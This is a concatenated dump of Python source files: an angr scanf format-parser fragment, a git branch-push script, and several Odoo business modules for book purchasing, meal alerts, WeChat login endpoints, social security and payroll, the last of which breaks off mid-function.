For SimProcedures relying on scanf-style format strings.
"""
basic_spec = {
b'd': sim_type.SimTypeInt(), # 'int',
b'i': sim_type.SimTypeInt(), # 'int',
b'o': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'u': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'x': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'X': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'e': sim_type.SimTypeFloat(), # 'float',
b'E': sim_type.SimTypeFloat(), # 'float',
b'f': sim_type.SimTypeFloat(), # 'float',
b'F': sim_type.SimTypeFloat(), # 'float',
b'g': sim_type.SimTypeFloat(), # 'float',
b'G': sim_type.SimTypeFloat(), # 'float',
b'a': sim_type.SimTypeFloat(), # 'float',
b'A': sim_type.SimTypeFloat(), # 'float',
b'c': sim_type.SimTypeChar(), # 'char',
b's': sim_type.SimTypePointer(sim_type.SimTypeChar()), # 'char*',
b'p': sim_type.SimTypePointer(sim_type.SimTypeInt(signed=False)), # 'uintptr_t',
b'n': sim_type.SimTypePointer(sim_type.SimTypeInt(signed=False)),
}
# All float conversion specifiers
float_spec = [b'e', b'E', b'f', b'F', b'g', b'G', b'a', b'A']
# Length modifiers and how they apply to float conversion.
float_len_mod = {
b'l': sim_type.SimTypeDouble, # 'double',
b'll': sim_type.SimTypeDouble, # 'long double',
}
@property
def _mod_spec(self):
"""
Modified length specifiers: mapping between length modifiers and conversion specifiers. This generates all the
possibilities, i.e. lf, etc.
"""
if FormatParser._MOD_SPEC is None:
mod_spec = dict(super()._mod_spec.items())
for mod, size in self.float_len_mod.items():
for conv in self.float_spec:
mod_spec[mod + conv] = size
FormatParser._MOD_SPEC = mod_spec
return FormatParser._MOD_SPEC
from angr.errors import SimProcedureArgumentError, SimProcedureError, SimSolverError
``` |
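`extract_components`/`_match_spec` above split a concrete format string into literal byte chunks and `FormatSpecifier` objects before printf/scanf semantics are applied. The sketch below is a deliberately simplified, regex-based stand-in for that splitting step; it is not angr's implementation and ignores symbolic bytes, `.*` precision arguments, and padding flags.

```python
import re

# Simplified stand-in for FormatParser.extract_components: split a concrete
# printf-style format string into literal chunks and specifier tokens.
SPEC_RE = re.compile(rb'%[0-9.*]*(?:hh|h|ll|l|j|z|t)?[diouxXeEfFgGaAcspn%]')

def split_format(fmt: bytes):
    parts, pos = [], 0
    for m in SPEC_RE.finditer(fmt):
        if m.start() > pos:
            parts.append(fmt[pos:m.start()])   # literal text
        parts.append(('spec', m.group()))      # format specifier
        pos = m.end()
    if pos < len(fmt):
        parts.append(fmt[pos:])
    return parts

print(split_format(b"id=%d name=%5s\n"))
# [b'id=', ('spec', b'%d'), b' name=', ('spec', b'%5s'), b'\n']
```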
{
"source": "13579and2468/osc2022",
"score": 3
} |
#### File: osc2022/tools/update-branchs.py
```python
import argparse
import typing
import yaml
import git
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('file')
args = parser.parse_args()
with open(args.file) as f:
ids = yaml.safe_load(f)
# find origin
repo = git.Repo(".")
origin = repo.remote(name='origin')
fetch_infos: typing.List[git.remote.FetchInfo] = origin.fetch()
source_branch: git.RemoteReference = origin.refs["0856085-example"]
origin_head = repo.head.ref
source_branch.checkout()
def exist_branch(name: str) -> bool:
for info in fetch_infos:
if name in info.name:
return True
return False
push_count = 0
try:
for idx in ids:
if exist_branch(idx):
print(f'{idx} already exists!')
continue
print(f'create {idx} & push ...')
# create branch
h = repo.create_head(idx)
# push
origin.push(idx)
# remove local
repo.delete_head(h)
push_count += 1
print(f'total: {len(ids)}, push {push_count} branch')
finally:
origin_head.checkout()
``` |
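The script expects a YAML file whose content is a flat list of ids, one remote branch being created and pushed per entry on top of the `0856085-example` branch. A hedged sketch of producing and checking such an input file; the file name and ids here are made up.

```python
import yaml

# Assumed input format for tools/update-branchs.py: a flat YAML list of ids.
ids = ["0812345", "0867890"]              # illustrative ids
with open("ids.yaml", "w") as f:
    yaml.safe_dump(ids, f)

print(yaml.safe_load(open("ids.yaml")))   # ['0812345', '0867890']
# then run: python tools/update-branchs.py ids.yaml
```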
{
"source": "13611843966/odooExtModel",
"score": 2
} |
#### File: odoo_book_lending/models/books_purchase.py
```python
import logging
from odoo import api, fields, models
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
class BooksPurchase(models.Model):
_description = '图书采购'
_name = 'odoo.books.purchase'
_inherit = ['mail.thread', 'mail.activity.mixin']
_rec_name = 'code'
PURCHASESTATE = [
('draft', '草稿'),
('purchase', '采购中'),
('confirm', '已完成'),
('close', '作废'),
]
name = fields.Char(string="采购标题", required=True, track_visibility='onchange')
code = fields.Char(string="采购编号", index=True, track_visibility='onchange', default='New')
company_id = fields.Many2one('res.company', '公司', default=lambda self: self.env.user.company_id.id)
user_id = fields.Many2one(comodel_name="res.users", string="采购人", default=lambda self: self.env.user.id)
purchase_date = fields.Date(string="采购日期", default=fields.Date.context_today)
state = fields.Selection(string="状态", selection=PURCHASESTATE, default='draft')
notes = fields.Text(string="备注")
line_ids = fields.One2many(comodel_name="odoo.books.purchase.line", inverse_name="purchase_id", string="采购列表")
@api.model
def create(self, values):
values['code'] = self.env['ir.sequence'].sudo().next_by_code('odoo.books.purchase.code')
return super(BooksPurchase, self).create(values)
def submit_purchase(self):
"""
确认采购
:return:
"""
for res in self:
res.write({'state': 'purchase'})
for line in res.line_ids:
if line.number < 1:
raise UserError("采购数量不正确,请纠正!")
def confirm_purchase(self):
"""
完成采购,写入图书信息
:return:
"""
for res in self:
res.write({'state': 'confirm'})
for line in res.line_ids:
line.book_id.write({
'number': line.book_id.number + line.number
})
def return_draft(self):
"""
退回
:return:
"""
for res in self:
res.write({'state': 'draft'})
def close_apply(self):
"""
作废
:return:
"""
for res in self:
res.write({'state': 'close'})
def unlink(self):
for res in self:
if res.state != 'draft':
raise UserError("非草稿单据不允许删除!")
return super(BooksPurchase, self).unlink()
class BooksPurchaseLine(models.Model):
_description = '图书采购列表'
_name = 'odoo.books.purchase.line'
_rec_name = 'purchase_id'
purchase_id = fields.Many2one(comodel_name="odoo.books.purchase", string="图书采购", ondelete='set null')
book_id = fields.Many2one(comodel_name="odoo.books", string="图书名称", required=True)
code = fields.Char(string="图书编号")
type_id = fields.Many2one(comodel_name="odoo.books.type", string="图书类型")
author = fields.Char(string="作者")
version = fields.Char(string="版本")
number = fields.Integer(string="数量", default=1)
price = fields.Float(string="单价(¥)")
book_time = fields.Datetime(string="预计到货时间")
@api.onchange('book_id')
def _onchange_book_id(self):
"""
:return:
"""
if self.book_id:
self.code = self.book_id.code
self.type_id = self.book_id.type_id.id
self.author = self.book_id.author
self.version = self.book_id.version
self.price = self.book_id.price
```
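A hedged usage sketch of the purchase flow above, e.g. from an Odoo shell where `env` is provided and `book` is assumed to be an existing `odoo.books` record; the `(0, 0, vals)` one2many command creates the order line in place.

```python
# Run e.g. in an Odoo shell; `env` comes from the shell, `book` is assumed to exist.
purchase = env['odoo.books.purchase'].create({
    'name': 'Q1 restock',
    'line_ids': [(0, 0, {'book_id': book.id, 'number': 5, 'price': 39.0})],
})
purchase.submit_purchase()    # draft -> purchase, rejects lines with number < 1
purchase.confirm_purchase()   # purchase -> confirm, adds 5 to book.number
```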
#### File: odoo_book_meal/models/meal_alert.py
```python
import datetime
import logging
from odoo import api, fields, models, _
_logger = logging.getLogger(__name__)
class MealAlert(models.Model):
_name = 'odoo.meal.alert'
_description = '公告消息'
_rec_name = 'message'
ALERTSTATE = [
('specific', '指定日'),
('week', '每周'),
('days', '每天')
]
display = fields.Boolean(compute='_compute_display_get')
message = fields.Text('信息', required=True)
alert_type = fields.Selection(ALERTSTATE, string='类型', required=True, index=True, default='specific')
partner_id = fields.Many2one('res.partner', string="供应商")
specific_day = fields.Date('日期', default=fields.Date.context_today)
monday = fields.Boolean('星期一')
tuesday = fields.Boolean('星期二')
wednesday = fields.Boolean('星期三')
thursday = fields.Boolean('星期四')
friday = fields.Boolean('星期五')
saturday = fields.Boolean('星期六')
sunday = fields.Boolean('星期日')
start_hour = fields.Float('介于', oldname='active_from', required=True, default=7)
end_hour = fields.Float('和', oldname='active_to', required=True, default=23)
active = fields.Boolean(default=True)
@api.multi
def name_get(self):
return [(alert.id, '%s %s' % (_('公告'), '#%d' % alert.id)) for alert in self]
@api.depends('alert_type', 'specific_day', 'monday', 'tuesday', 'thursday', 'friday', 'saturday', 'sunday', 'start_hour', 'end_hour')
def _compute_display_get(self):
days_codes = {
'0': 'sunday',
'1': 'monday',
'2': 'tuesday',
'3': 'wednesday',
'4': 'thursday',
'5': 'friday',
'6': 'saturday'
}
fullday = False
now = datetime.datetime.now()
if self.env.context.get('lunch_date'):
lunch_date = fields.Datetime.from_string(self.env.context['lunch_date'])
fullday = lunch_date > now
now = max(lunch_date, now)
mynow = fields.Datetime.context_timestamp(self, now)
for alert in self:
can_display_alert = {
'specific': (str(alert.specific_day) == fields.Date.to_string(mynow)),
'week': alert[days_codes[mynow.strftime('%w')]],
'days': True
}
if can_display_alert[alert.alert_type]:
hour_to = int(alert.end_hour)
min_to = int((alert.end_hour - hour_to) * 60)
to_alert = datetime.time(hour_to, min_to)
hour_from = int(alert.start_hour)
min_from = int((alert.start_hour - hour_from) * 60)
from_alert = datetime.time(hour_from, min_from)
if fullday or (from_alert <= mynow.time() <= to_alert):
alert.display = True
else:
alert.display = False
```
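`_compute_display_get` above turns the float `start_hour`/`end_hour` fields into `datetime.time` values before comparing them with the (context-localised) current time. A minimal standalone sketch of that hour/minute conversion:

```python
import datetime

def float_to_time(hours: float) -> datetime.time:
    # same conversion as above: 7.5 -> 07:30, 23.0 -> 23:00
    h = int(hours)
    m = int((hours - h) * 60)
    return datetime.time(h, m)

start, end = float_to_time(7.0), float_to_time(23.5)
now = datetime.datetime.now().time()
print(start <= now <= end)   # True only between 07:00 and 23:30
```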
#### File: odoo_hcm/controllers/res_users.py
```python
import json
import logging
from odoo import http, _
from odoo.addons.web.controllers.main import ensure_db, Home
from odoo.http import request
from . import api_tool
_logger = logging.getLogger(__name__)
class ResUserAPI(Home, http.Controller):
@http.route('/api/wx/users/password/update', type='http', auth='none', methods=['get', 'post'], csrf=False)
def api_wx_users_update_pwd(self, **kw):
"""
修改用户密码: 需要先检查员工对应的系统用户,存在系统用户时才允许修改密码
:param kw:(openid appid password
:return:
"""
params_data = request.params.copy()
if not api_tool.check_api_access(params_data.get('appid')):
return json.dumps({'state': False, 'msg': '拒绝访问'})
openid = params_data.get('openid')
password = params_data.get('password')
if not openid or not password:
return json.dumps({'state': False, 'msg': '参数不正确'})
# 查询是否已绑定员工
employee = request.env['hr.employee'].sudo().search([('wx_openid', '=', openid)])
if not employee:
return json.dumps({'state': False, 'msg': '未绑定员工,不需要修改密码!'})
if not employee.user_id:
return json.dumps({'state': False, 'msg': '员工没有关联登录系统的用户账户,不需要修改密码操作!'})
employee.user_id.sudo().write({
'password': password
})
return json.dumps({'state': True, 'msg': '新的密码已生效!'})
```
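A hedged client-side sketch of calling the password-update route defined above; the base URL and credential values are placeholders, and `appid` must pass `api_tool.check_api_access` on the server.

```python
import requests

BASE_URL = "http://localhost:8069"        # placeholder Odoo host
resp = requests.post(BASE_URL + "/api/wx/users/password/update",
                     data={"appid": "your-appid",        # illustrative values
                           "openid": "wx-openid",
                           "password": "new-password"},
                     timeout=5)
print(resp.json())   # {'state': True/False, 'msg': ...}
```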
#### File: odoo_hcm/controllers/weixin_api.py
```python
import logging
import requests
from odoo.http import Controller, route, json, request
from . import api_tool
logger = logging.getLogger(__name__)
class WeiXinApiInterface(Controller):
"""微信api接口"""
@route('/api/wx/openid/get', type='http', auth='none', methods=['get', 'post'], csrf=False)
def wx_get_openid(self, **kw):
"""
用appid和secret到微信api中换取微信用户openid
:param kw:
:return: openid
"""
wx_code = request.params['usercode']
app_id = request.params['appid']
secret = request.params['secret']
if not wx_code or not app_id or not secret:
return False
if not api_tool.check_api_access(app_id):
return False
url = "https://api.weixin.qq.com/sns/jscode2session?"
new_url = "{}appid={}&secret={}&js_code={}&grant_type=authorization_code".format(url, app_id, secret, wx_code)
result = requests.get(url=new_url, timeout=5)
result = json.loads(result.text)
return result['openid']
@route('/api/wx/employee/check/openid', type='http', auth='none', methods=['get', 'post'], csrf=False)
def wx_check_employee_openid(self, **kw):
"""
根据微信openid查询员工是否存在
:param kw:
:return:
"""
app_id = request.params['appid']
openid = request.params['openid']
if not openid:
return json.dumps({'state': False, 'msg': '未检测到openid参数'})
if not api_tool.check_api_access(app_id):
return json.dumps({'state': False, 'msg': '拒绝访问'})
employee = request.env['hr.employee'].sudo().search([('wx_openid', '=', openid)])
if not employee:
return json.dumps({'state': False, 'msg': '未绑定员工'})
return json.dumps({'state': True, 'msg': '已绑定员工'})
@route('/api/wx/openid/get_and_check', type='http', auth='none', methods=['get', 'post'], csrf=False)
def wx_get_openid_and_check_openid(self, **kw):
"""
用appid和secret到微信api中换取微信用户openid,然后在系统中查看是否已绑定员工,返回查询绑定的结果和openid
:param kw:
:return:
"""
params = request.params.copy()
wx_code = params.get('usercode')
app_id = params.get('appid')
secret = params.get('secret')
if not wx_code or not app_id or not secret:
return json.dumps({'state': False, 'msg': '参数不正确'})
if not api_tool.check_api_access(app_id):
return json.dumps({'state': False, 'msg': '拒绝访问'})
url = "https://api.weixin.qq.com/sns/jscode2session?"
new_url = "{}appid={}&secret={}&js_code={}&grant_type=authorization_code".format(url, app_id, secret, wx_code)
result = requests.get(url=new_url, timeout=5)
result = json.loads(result.text)
employee = request.env['hr.employee'].sudo().search([('wx_openid', '=', result['openid'])], limit=1)
if not employee:
return json.dumps({'state': False, 'msg': '未绑定员工', 'openid': result['openid']})
employee_data = api_tool.create_employee_data(employee)
return json.dumps({'state': True, 'msg': '已绑定员工', 'openid': result['openid'], 'employee': employee_data})
@route('/api/wx/post/message', type='http', auth='none', methods=['get', 'post'], csrf=False)
def get_wx_post_message(self, **kw):
"""
接受微信端用户发给小程序的消息以及开发者需要的事件推送
:param kw:
:return:
"""
# 示例消息体:
# 'signature', '82c88ea4f7380758928f594cad9606ad56eef537'), ('echostr', '760986963397047803'), ('timestamp', '1568289201'), ('nonce', '1232323960')
params = request.params.copy()
logging.info("-----微信推送消息-------")
logging.info(params)
logging.info("-----json-str-end-------")
return params.get('echostr')
# token = "<PASSWORD>"
# EncodingAESKey = "<KEY>"
```
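The controllers above exchange the mini-program's `js_code` for an `openid` through WeChat's `jscode2session` endpoint. A standalone sketch of that exchange; note that on failure WeChat returns an `errcode`/`errmsg` pair instead of `openid`, which the controllers above do not guard against.

```python
import json
import requests

def exchange_code(appid: str, secret: str, js_code: str) -> dict:
    # js_code comes from wx.login() in the mini-program; appid/secret identify the app.
    url = ("https://api.weixin.qq.com/sns/jscode2session"
           "?appid={}&secret={}&js_code={}&grant_type=authorization_code"
           ).format(appid, secret, js_code)
    resp = requests.get(url, timeout=5)
    return json.loads(resp.text)

# result = exchange_code('wx123...', 'app-secret', 'code-from-wx.login')
# result.get('openid') on success, result.get('errcode') on failure
```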
#### File: odoo_social_security/models/insured_scheme_emp.py
```python
import logging
from odoo import api, fields, models, _
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
class InsuredSchemeEmployee(models.Model):
_description = '参保员工'
_name = 'insured.scheme.employee'
_rec_name = 'name'
_order = 'id'
active = fields.Boolean(string=u'Active', default=True)
payment_method = fields.Selection(string=u'缴纳方式', selection=[('company', '公司自缴'), ('other', '其他'), ], default='company')
company_id = fields.Many2one('res.company', '公司', default=lambda self: self.env.user.company_id, index=True)
employee_id = fields.Many2one(comodel_name='hr.employee', string=u'参保员工', index=True, copy=False)
department_id = fields.Many2one(comodel_name='hr.department', string=u'所属部门', index=True, copy=False)
scheme_id = fields.Many2one(comodel_name='insured.scheme', string=u'参保方案')
social_security_start_date = fields.Date(string=u'社保起始日期')
public_fund_start_date = fields.Date(string=u'公积金起始日期')
notes = fields.Text(string=u'备注')
name = fields.Char(string="真实姓名", required=True)
phone = fields.Char(string="手机号码")
identification = fields.Char(string="身份证号码")
state = fields.Selection(string=u'状态', selection=[('normal', '正常'), ('pause', '暂停'), ('close', '停保')], default='normal')
ttype = fields.Selection(string="参保类型", selection=[('new', '新参保'), ('on', '续保'), ], default='new')
@api.onchange('employee_id')
def _onchange_employee_id(self):
for res in self:
if res.employee_id:
res.department_id = res.employee_id.department_id.id
res.name = res.employee_id.name
res.phone = res.employee_id.work_phone
@api.constrains('employee_id')
def _constrains_employee(self):
for res in self:
emp_count = self.search_count([('employee_id', '=', res.employee_id.id)])
if emp_count > 1:
raise UserError(_("该员工已是参保状态"))
def state_to_pause(self):
for res in self:
res.state = 'pause'
def state_to_normal(self):
for res in self:
res.state = 'normal'
def state_to_close(self):
for res in self:
res.state = 'close'
def action_insured(self):
"""
调整到该员工的月结账单
"""
for res in self:
action = self.env.ref('odoo_social_security.insured_monthly_statement_action').read()[0]
action['domain'] = [('employee_id', '=', res.employee_id.id)]
return action
```
#### File: odoo_wage_manage/models/wage_calculate_salary_rules.py
```python
import logging
from odoo import api, fields, models
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
class WageCalculateSalaryRules(models.Model):
_description = '计薪规则'
_name = 'wage.calculate.salary.rules'
_rec_name = 'name'
name = fields.Char(string='规则名称')
notes = fields.Text(string=u'备注')
PLSELECTION = [('dingding', '从钉钉花名册提取'), ('odoo', '从Odoo员工提取')]
personnel_information = fields.Selection(string=u'人事信息', selection=PLSELECTION, default='dingding')
FIXEDSELECTION = [
('00', '基本工资'),
('01', '基本工资+薪资档案(薪资项目金额总和)'),
]
fixed_salary = fields.Selection(string=u'固定工资', selection=FIXEDSELECTION, default='01')
PERFORMANCESELECTION = [('import', '每月手动导入')]
performance_bonus = fields.Selection(string=u'绩效奖金', selection=PERFORMANCESELECTION, default='import')
leave_selection = [
('00', '基本工资/应出勤天数/8*请假小时'),
('01', '基本工资/应出勤天数*请假小时'),
('02', '(按次数) 次数*每次事假扣款'),
]
leave_deduction = fields.Selection(string=u'事假扣款规则', selection=leave_selection, default='00')
hour_leave_number = fields.Integer(string=u'多少小时算1次事假')
leave_money = fields.Float(string=u'每次事假扣款', digits=(10, 2))
sick_selection = [
('00', '基本工资/2/应出勤天数/8*请假小时'),
('01', '基本工资/应出勤天数*请假小时*病假扣款比例'),
('02', '基本工资/应出勤天数*请假小时/8*病假扣款比例'),
('03', '(按次数) 次数*每次病假扣款'),
]
sick_deduction = fields.Selection(string=u'病假扣款规则', selection=sick_selection, default='00')
hour_sick_number = fields.Integer(string=u'多少小时算1次病假')
sick_money = fields.Float(string=u'每次病假扣款', digits=(10, 2))
sick_deduction_ratio = fields.Float(string=u'病假扣款比例', digits=(10, 2))
work_overtime_selection = [
('00', '基本工资/应出勤天数/8*加班小时*倍数'),
('01', '加班小时*固定金额'),
]
work_overtime_deduction = fields.Selection(string=u'工作日加班规则', selection=work_overtime_selection, default='00')
work_overtime_money = fields.Float(string=u'固定金额', digits=(10, 2))
work_overtime_multiple = fields.Float(string=u'倍数', digits=(10, 1))
weekend_selection = [
('00', '基本工资/应出勤天数/8*加班小时*倍数'),
('01', '加班小时*固定金额'),
]
weekend_deduction = fields.Selection(string=u'周末加班规则', selection=weekend_selection, default='00')
weekend_money = fields.Float(string=u'固定金额', digits=(10, 2))
weekend_multiple = fields.Float(string=u'倍数', digits=(10, 1))
holiday_selection = [
('00', '基本工资/应出勤天数/8*加班小时*倍数'),
('01', '加班小时*固定金额'),
]
holiday_deduction = fields.Selection(string=u'节假日加班规则', selection=holiday_selection, default='00')
holiday_money = fields.Float(string=u'固定金额', digits=(10, 2))
holiday_multiple = fields.Float(string=u'倍数', digits=(10, 1))
# -----考勤------
late_attendance_selection = [
('00', '迟到次数*扣款金额'),
]
late_attendance_deduction = fields.Selection(string=u'考勤迟到规则', selection=late_attendance_selection, default='00')
late_attendance_money = fields.Float(string=u'扣款金额', digits=(10, 2))
notsigned_selection = [
('00', '忘记打款次数*扣款金额'),
]
notsigned_deduction = fields.Selection(string=u'忘记打卡规则', selection=notsigned_selection, default='00')
notsigned_money = fields.Float(string=u'扣款金额', digits=(10, 2))
early_selection = [
('00', '早退次数*扣款金额'),
]
early_deduction = fields.Selection(string=u'早退打卡规则', selection=early_selection, default='00')
early_money = fields.Float(string=u'扣款金额', digits=(10, 2))
@api.multi
def compute_leave_deduction(self, base_wage, days, hours):
"""
计算事假
:param base_wage: 基本工资
:param days: 出勤天数
:param hours: 事假缺勤小时
:return:
"""
if self.leave_deduction == '00':
# ('基本工资/应出勤天数/8*请假小时'
return base_wage / days / 8 * hours
elif self.leave_deduction == '01':
# '基本工资/应出勤天数*请假小时'
return base_wage / days * hours
else:
# (按次数) 次数*每次事假扣款
return int(hours / self.hour_leave_number) * self.leave_money
@api.multi
def compute_sick_absence(self, base_wage, days, hours):
"""
计算病假扣款
:param base_wage:
:param days:
:param hours:
:return:
"""
if self.sick_deduction == '00':
# 基本工资/2/应出勤天数/8*请假小时
return base_wage/2/days/8*hours
elif self.sick_deduction == '01':
# 基本工资/应出勤天数*请假小时*病假扣款比例
return base_wage / days * hours * self.sick_deduction_ratio
elif self.sick_deduction == '02':
# 基本工资/应出勤天数*请假小时/8*病假扣款比例
return base_wage / days * hours / 8 * self.sick_deduction_ratio
else:
# (按次数) 次数*每次病假扣款')
return int(hours/self.hour_sick_number) * self.sick_money
@api.multi
def compute_work_overtime(self, base_wage, days, hours):
"""
计算工作日加班费用
:param base_wage:
:param days:
:param hours:
:return:
"""
if self.work_overtime_deduction == '00':
# 基本工资/应出勤天数/8*加班小时*倍数
return base_wage/days/8*hours*self.work_overtime_multiple
else:
# 加班小时*固定金额
return hours * self.work_overtime_money
@api.multi
def compute_weekend_overtime(self, base_wage, days, hours):
"""
计算周末加班费用
:param base_wage:
:param days:
:param hours:
:return:
"""
if self.weekend_deduction == '00':
# 基本工资/应出勤天数/8*加班小时*倍数
return base_wage/days/8*hours*self.weekend_multiple
else:
# 加班小时*固定金额
return hours * self.weekend_money
@api.multi
def compute_holiday_overtime(self, base_wage, days, hours):
"""
计算节假日加班费用
:param base_wage:
:param days:
:param hours:
:return:
"""
if self.holiday_deduction == '00':
# 基本工资/应出勤天数/8*加班小时*倍数
return base_wage/days/8*hours*self.holiday_multiple
else:
# 加班小时*固定金额
return hours * self.holiday_money
@api.multi
def compute_late_attendance(self, attendance_num):
"""
计算迟到扣款费用
:param attendance_num:
:return:
"""
if self.late_attendance_deduction == '00':
# 迟到次数*扣款金额
return attendance_num * self.late_attendance_money
else:
return 0
@api.multi
def compute_notsigned_attendance(self, attendance_num):
"""
计算忘记打卡扣款费用
:param attendance_num:
:return:
"""
if self.notsigned_deduction == '00':
# 忘记打款次数*扣款金额
return attendance_num * self.notsigned_money
else:
return 0
@api.multi
def compute_early_attendance(self, attendance_num):
"""
计算早退扣款费用
:param attendance_num:
:return:
"""
if self.early_deduction == '00':
# 早退次数*扣款金额
return attendance_num * self.early_money
else:
return 0
```
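Worked numbers for the default ('00') rules above, assuming an illustrative base wage of 8800, 22 scheduled work days, 8 hours of personal leave and 4 hours of weekday overtime at a 1.5x multiple:

```python
# Illustrative figures only; field values would come from the rule record.
base_wage, days = 8800.0, 22

leave_hours = 8
leave_deduction = base_wage / days / 8 * leave_hours             # 400.0

overtime_hours, multiple = 4, 1.5
overtime_pay = base_wage / days / 8 * overtime_hours * multiple  # 300.0

print(leave_deduction, overtime_pay)
```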
#### File: odoo_wage_manage/wizard/wage_employee_tax_details.py
```python
import logging
from odoo import api, fields, models
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
class WageEmployeeTaxDetailsTransient(models.TransientModel):
_name = 'wage.employee.tax.details.transient'
_description = "初始化员工个税"
start_date = fields.Date(string=u'年开始日期', required=True)
end_date = fields.Date(string=u'年结束日期', required=True)
year = fields.Char(string='年份')
emp_ids = fields.Many2many('hr.employee', string=u'员工', required=True)
all_emp = fields.Boolean(string=u'全部员工?')
@api.onchange('all_emp')
def onchange_all_emp(self):
"""
获取全部员工
:return:
"""
if self.all_emp:
employees = self.env['hr.employee'].search([])
self.emp_ids = [(6, 0, employees.ids)]
@api.onchange('start_date')
def _alter_form_year(self):
"""
根据日期生成年份
:return:
"""
for res in self:
if res.start_date:
res.year = str(res.start_date)[:4]
@api.multi
def init_employee_tax_details(self):
"""
初始化员工个税
:return:
"""
self.ensure_one()
year = str(self.start_date)[:4]
line_list = self._get_detail_line()
for emp in self.emp_ids:
detail_data = {
'employee_id': emp.id,
'start_date': self.start_date,
'end_date': self.end_date,
'year': year,
'line_ids': line_list,
}
domain = [('employee_id', '=', emp.id), ('year', '=', year)]
details = self.env['wage.employee.tax.details'].sudo().search(domain)
if not details:
self.env['wage.employee.tax.details'].create(detail_data)
return {'type': 'ir.actions.act_window_close'}
@api.model
def _get_detail_line(self):
# 默认加载12个月份到列表
line_list = list()
i = 1
while i < 13:
if i < 10:
line_list.append((0, 0, {
'month': "0{}".format(str(i)),
}))
else:
line_list.append((0, 0, {
'month': str(i),
}))
i += 1
return line_list
```
#### File: odoo_wage_manage/wizard/wage_payroll_accounting.py
```python
import logging
from odoo import api, fields, models
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
class WagePayrollAccountingTransient(models.TransientModel):
_name = 'wage.payroll.accounting.transient'
_description = "薪资计算"
wage_date = fields.Date(string=u'核算月份', required=True, default=fields.date.today())
date_code = fields.Char(string='期间代码')
emp_ids = fields.Many2many('hr.employee', string=u'员工')
all_emp = fields.Boolean(string=u'全部员工?')
@api.onchange('all_emp')
def onchange_all_emp(self):
"""
获取全部员工
:return:
"""
if self.all_emp:
employees = self.env['hr.employee'].search([])
self.emp_ids = [(6, 0, employees.ids)]
else:
self.emp_ids = False
@api.onchange('wage_date')
def _alter_date_code(self):
"""
根据日期生成期间代码
:return:
"""
for res in self:
if res.wage_date:
wage_date = str(res.wage_date)
res.date_code = "{}/{}".format(wage_date[:4], wage_date[5:7])
def compute_payroll_accounting(self):
"""
计算薪资
:return:
"""
self.ensure_one()
wage_date = str(self.wage_date)
date_code = "{}/{}".format(wage_date[:4], wage_date[5:7])
# 获取应出勤天数
attendance_days = self.env['wage.attend.days.config'].get_month_attend_day(date_code[:4], date_code[5:7])
# 获取薪酬计算规则
rules = self.env['wage.calculate.salary.rules'].search([], limit=1)
if not rules:
raise UserError("请先配置一个薪资计算规则!")
for emp in self.emp_ids:
payroll_data = {
'wage_date': self.wage_date,
'date_code': date_code,
'employee_id': emp.id,
'department_id': emp.department_id.id if emp.department_id else False,
'job_id': emp.job_id.id if emp.job_id else False,
'attendance_days': attendance_days,
}
# 获取员工薪资合同
contract = self.env['hr.contract'].search([('employee_id', '=', emp.id), ('state', '=', 'open')], limit=1)
base_wage = performance_amount_sum = structure_amount_sum = 0 # 基本工资,绩效合计,薪资结构合计金额
structure_ids = list()
performance_ids = list()
statement_ids = list()
if contract:
# 读取薪资档案中员工薪资结构数据
structure_ids, structure_amount_sum = contract.get_employee_wage_structure()
base_wage = contract.wage
# 获取绩效列表
domain = [('employee_id', '=', emp.id), ('performance_code', '=', date_code)]
performance = self.env['wage.employee.performance.manage'].search(domain, limit=1)
if performance:
performance_ids, performance_amount_sum = performance.get_emp_performance_list()
# 获取社保月结账单
statement_ids = provident_ids = False
domain = [('employee_id', '=', emp.id), ('date_code', '=', date_code)]
statements = self.env['insured.monthly.statement'].search(domain, limit=1)
if statements:
statement_ids, provident_ids = statements.get_employee_all_list()
payroll_data.update({
'base_wage': base_wage, # 基本工资
'structure_ids': structure_ids, # 薪资结构
'performance_ids': performance_ids, # 绩效列表
'statement_ids': statement_ids or False, # 社保
'provident_ids': provident_ids or False, # 公积金
})
# 获取员工考勤统计表
domain = [('employee_id', '=', emp.id), ('attend_code', '=', date_code)]
attendance = self.env['wage.employee.attendance.annal'].search(domain, limit=1)
absence_amount_sum = overtime_amount_sum = attendance_amount_sum = 0
if attendance:
# 计算事假
leave_absence = rules.compute_leave_deduction(base_wage, attendance_days, attendance.leave_absence_hour)
# 计算病假
sick_absence = rules.compute_sick_absence(base_wage, attendance_days, attendance.sick_absence_hour)
# 工作日加班费
work_overtime = rules.compute_work_overtime(base_wage, attendance_days, attendance.work_overtime_hour)
# 周末加班费
weekend_overtime = rules.compute_weekend_overtime(base_wage, attendance_days, attendance.weekend_overtime_hour)
# 节假日加班费
holiday_overtime = rules.compute_holiday_overtime(base_wage, attendance_days, attendance.holiday_overtime_hour)
# 迟到扣款
late_attendance = rules.compute_late_attendance(attendance.late_attendance_num)
# 忘记打卡扣款
notsigned_attendance = rules.compute_notsigned_attendance(attendance.notsigned_attendance_num)
# 早退扣款
early_attendance = rules.compute_early_attendance(attendance.early_attendance_num)
payroll_data.update({
'leave_absence': leave_absence,
'sick_absence': sick_absence,
'work_overtime': work_overtime,
'weekend_overtime': weekend_overtime,
'holiday_overtime': holiday_overtime,
'late_attendance': late_attendance,
'notsigned_attendance': notsigned_attendance,
'early_attendance': early_attendance,
})
absence_amount_sum = leave_absence + sick_absence
overtime_amount_sum = work_overtime+weekend_overtime+holiday_overtime
attendance_amount_sum = late_attendance+notsigned_attendance+early_attendance
# 计算应发工资
# 应发工资=基本工资+薪资结构+绩效合计-缺勤扣款合计+加班费合计-打卡扣款合计
pay_wage = base_wage+structure_amount_sum+performance_amount_sum-absence_amount_sum+overtime_amount_sum-attendance_amount_sum
payroll_data.update({'pay_wage': pay_wage})
payroll_data = self._compute_employee_tax(pay_wage, payroll_data, emp, date_code)
# 判断是否已存在该期间的员工核算信息
domain = [('employee_id', '=', emp.id), ('date_code', '=', date_code)]
payrolls = self.env['wage.payroll.accounting'].search(domain)
if not payrolls:
self.env['wage.payroll.accounting'].create(payroll_data)
else:
if payrolls.state == 'draft':
